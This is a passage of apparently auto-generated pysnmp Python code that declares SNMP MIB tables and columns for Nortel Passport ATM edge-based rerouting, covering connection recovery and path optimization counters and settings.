1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 3), Gauge32().subtype(\n subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrIneligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfVptIispEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 9, 6, 7, 40))\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrStatsTable.setStatus('mandatory')\nmscAtmIfVptIispEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 9, 6, 7, 40, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfVptIispIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptIispEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrStatsEntry.setStatus('mandatory')\nmscAtmIfVptIispEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4,\n 1, 562, 36, 2, 1, 114, 9, 6, 7, 40, 1, 1), Counter32()).setMaxAccess(\n 'readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfVptIispEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1,\n 562, 36, 2, 1, 114, 9, 6, 7, 40, 1, 2), Counter32()).setMaxAccess(\n 'readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrTotalPathOptimizations.setStatus('mandatory')\nmscAtmIfVptPnniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9,\n 7, 7))\nmscAtmIfVptPnniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, \n 1, 114, 9, 7, 7, 1))\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrRowStatusTable.setStatus('mandatory')\nmscAtmIfVptPnniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, \n 2, 1, 114, 9, 7, 7, 1, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfVptPnniIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptPnniEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrRowStatusEntry.setStatus('mandatory')\nmscAtmIfVptPnniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,\n 1, 114, 9, 7, 7, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrRowStatus.setStatus('mandatory')\nmscAtmIfVptPnniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,\n 2, 1, 114, 9, 7, 7, 1, 1, 2), DisplayString()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrComponentName.setStatus('mandatory')\nmscAtmIfVptPnniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, \n 2, 1, 114, 9, 7, 7, 1, 1, 4), StorageType()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrStorageType.setStatus('mandatory')\nmscAtmIfVptPnniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 9, 7, 7, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrIndex.setStatus('mandatory')\nmscAtmIfVptPnniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 9, 7, 7, 20))\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrProvTable.setStatus('mandatory')\nmscAtmIfVptPnniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 9, 7, 7, 20, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfVptPnniIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptPnniEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrProvEntry.setStatus('mandatory')\nmscAtmIfVptPnniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, \n 562, 36, 2, 1, 114, 9, 7, 7, 20, 1, 1), OctetString().subtype(\n subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue\n ='c0')).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrConnectionRecovery.setStatus('mandatory')\nmscAtmIfVptPnniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562,\n 36, 2, 1, 114, 9, 7, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=\n ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')\n ).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrPathOptimization.setStatus('mandatory')\nmscAtmIfVptPnniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 9, 7, 7, 30))\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrOperTable.setStatus('mandatory')\nmscAtmIfVptPnniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 9, 7, 7, 30, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfVptPnniIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptPnniEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrOperEntry.setStatus('mandatory')\nmscAtmIfVptPnniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1,\n 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=\n ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrSubscribedConnections.setStatus('mandatory')\nmscAtmIfVptPnniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1,\n 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 2), Gauge32().subtype(\n subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrEligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfVptPnniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6,\n 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 3), Gauge32().subtype(\n subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrIneligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfVptPnniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 9, 7, 7, 40))\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrStatsTable.setStatus('mandatory')\nmscAtmIfVptPnniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 9, 7, 7, 40, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfVptPnniIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptPnniEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrStatsEntry.setStatus('mandatory')\nmscAtmIfVptPnniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4,\n 1, 562, 36, 2, 1, 114, 9, 7, 7, 40, 1, 1), Counter32()).setMaxAccess(\n 'readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfVptPnniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1,\n 562, 36, 2, 1, 114, 9, 7, 7, 40, 1, 2), Counter32()).setMaxAccess(\n 'readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrTotalPathOptimizations.setStatus('mandatory')\nmscAtmIfVptUniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9,\n 8, 7))\nmscAtmIfVptUniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 9, 8, 7, 1))\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrRowStatusTable.setStatus('mandatory')\nmscAtmIfVptUniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2,\n 1, 114, 9, 8, 7, 1, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfVptUniIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptUniEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrRowStatusEntry.setStatus('mandatory')\nmscAtmIfVptUniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, \n 1, 114, 9, 8, 7, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrRowStatus.setStatus('mandatory')\nmscAtmIfVptUniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,\n 2, 1, 114, 9, 8, 7, 1, 1, 2), DisplayString()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrComponentName.setStatus('mandatory')\nmscAtmIfVptUniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,\n 1, 114, 9, 8, 7, 1, 1, 4), StorageType()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrStorageType.setStatus('mandatory')\nmscAtmIfVptUniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 9, 8, 7, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrIndex.setStatus('mandatory')\nmscAtmIfVptUniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,\n 9, 8, 7, 20))\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrProvTable.setStatus('mandatory')\nmscAtmIfVptUniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 9, 8, 7, 20, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfVptUniIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptUniEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrProvEntry.setStatus('mandatory')\nmscAtmIfVptUniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562,\n 36, 2, 1, 114, 9, 8, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=\n ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')\n ).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrConnectionRecovery.setStatus('mandatory')\nmscAtmIfVptUniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, \n 36, 2, 1, 114, 9, 8, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=\n ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')\n ).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrPathOptimization.setStatus('mandatory')\nmscAtmIfVptUniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,\n 9, 8, 7, 30))\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrOperTable.setStatus('mandatory')\nmscAtmIfVptUniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 9, 8, 7, 30, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfVptUniIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptUniEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrOperEntry.setStatus('mandatory')\nmscAtmIfVptUniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, \n 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=\n ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrSubscribedConnections.setStatus('mandatory')\nmscAtmIfVptUniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1,\n 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 2), Gauge32().subtype(\n subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrEligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfVptUniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, \n 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 3), Gauge32().subtype(\n subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrIneligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfVptUniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 9, 8, 7, 40))\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrStatsTable.setStatus('mandatory')\nmscAtmIfVptUniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 9, 8, 7, 40, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfVptUniIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptUniEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrStatsEntry.setStatus('mandatory')\nmscAtmIfVptUniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4,\n 1, 562, 36, 2, 1, 114, 9, 8, 7, 40, 1, 1), Counter32()).setMaxAccess(\n 'readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfVptUniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1,\n 562, 36, 2, 1, 114, 9, 8, 7, 40, 1, 2), Counter32()).setMaxAccess(\n 'readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrTotalPathOptimizations.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 9, 20, 8, 2))\nmscAtmIfVptVccSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36,\n 2, 1, 114, 9, 20, 8, 2, 1))\nif mibBuilder.loadTexts:\n mscAtmIfVptVccSrcEbrOvRowStatusTable.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, \n 36, 2, 1, 114, 9, 20, 8, 2, 1, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptVccIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmNetworkingMIB',\n 'mscAtmIfVptVccSrcIndex'), (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB',\n 'mscAtmIfVptVccSrcEbrOvIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVptVccSrcEbrOvRowStatusEntry.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,\n 2, 1, 114, 9, 20, 8, 2, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfVptVccSrcEbrOvRowStatus.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562,\n 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 2), DisplayString()).setMaxAccess(\n 'readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptVccSrcEbrOvComponentName.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, \n 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 4), StorageType()).setMaxAccess(\n 'readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptVccSrcEbrOvStorageType.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,\n 1, 114, 9, 20, 8, 2, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts:\n mscAtmIfVptVccSrcEbrOvIndex.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 9, 20, 8, 2, 20))\nif mibBuilder.loadTexts:\n mscAtmIfVptVccSrcEbrOvProvTable.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2,\n 1, 114, 9, 20, 8, 2, 20, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptVccIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmNetworkingMIB',\n 'mscAtmIfVptVccSrcIndex'), (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB',\n 'mscAtmIfVptVccSrcEbrOvIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVptVccSrcEbrOvProvEntry.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1,\n 562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1, 1), Integer32().subtype(\n subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(\n namedValues=NamedValues(('no', 0), ('yes', 1))).clone('yes')).setMaxAccess(\n 'readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfVptVccSrcEbrOvRecoverySubscribed.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, \n 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1, 2), Integer32().subtype(\n subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(\n namedValues=NamedValues(('no', 0), ('yes', 1))).clone('yes')).setMaxAccess(\n 'readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfVptVccSrcEbrOvOptimizationSubscribed.setStatus('mandatory')\nmscAtmIfVptVccEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,\n 9, 20, 12))\nmscAtmIfVptVccEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, \n 2, 1, 114, 9, 20, 12, 1))\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoRowStatusTable.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, \n 36, 2, 1, 114, 9, 20, 12, 1, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptVccIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptVccEbrInfoIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoRowStatusEntry.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,\n 2, 1, 114, 9, 20, 12, 1, 1, 1), RowStatus()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoRowStatus.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562,\n 36, 2, 1, 114, 9, 20, 12, 1, 1, 2), DisplayString()).setMaxAccess(\n 'readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoComponentName.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, \n 36, 2, 1, 114, 9, 20, 12, 1, 1, 4), StorageType()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoStorageType.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, \n 1, 114, 9, 20, 12, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoIndex.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 9, 20, 12, 30))\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoOperTable.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2,\n 1, 114, 9, 20, 12, 30, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptVccIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptVccEbrInfoIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoOperEntry.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1,\n 562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 1), Integer32().subtype(\n subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(\n namedValues=NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoRecoverySubscribed.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4,\n 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 2), Integer32().subtype(\n subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(\n namedValues=NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoOptimizationSubscribed.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1,\n 562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 3), Integer32().subtype(\n subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(\n namedValues=NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoConnectionRecovered.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 9, 20, 12, 40))\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoStatsTable.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2,\n 1, 114, 9, 20, 12, 40, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptVccIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptVccEbrInfoIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoStatsEntry.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1,\n 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1, 1), Counter32()).setMaxAccess(\n 'readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4,\n 1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1, 2), Counter32()).setMaxAccess(\n 'readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoTotalPathOptimizations.setStatus('mandatory')\nmscAtmIfPnniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7))\nmscAtmIfPnniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 96, 7, 1))\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrRowStatusTable.setStatus('mandatory')\nmscAtmIfPnniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, \n 1, 114, 96, 7, 1, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfPnniIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfPnniEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrRowStatusEntry.setStatus('mandatory')\nmscAtmIfPnniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 96, 7, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrRowStatus.setStatus('mandatory')\nmscAtmIfPnniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,\n 1, 114, 96, 7, 1, 1, 2), DisplayString()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrComponentName.setStatus('mandatory')\nmscAtmIfPnniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, \n 1, 114, 96, 7, 1, 1, 4), StorageType()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n 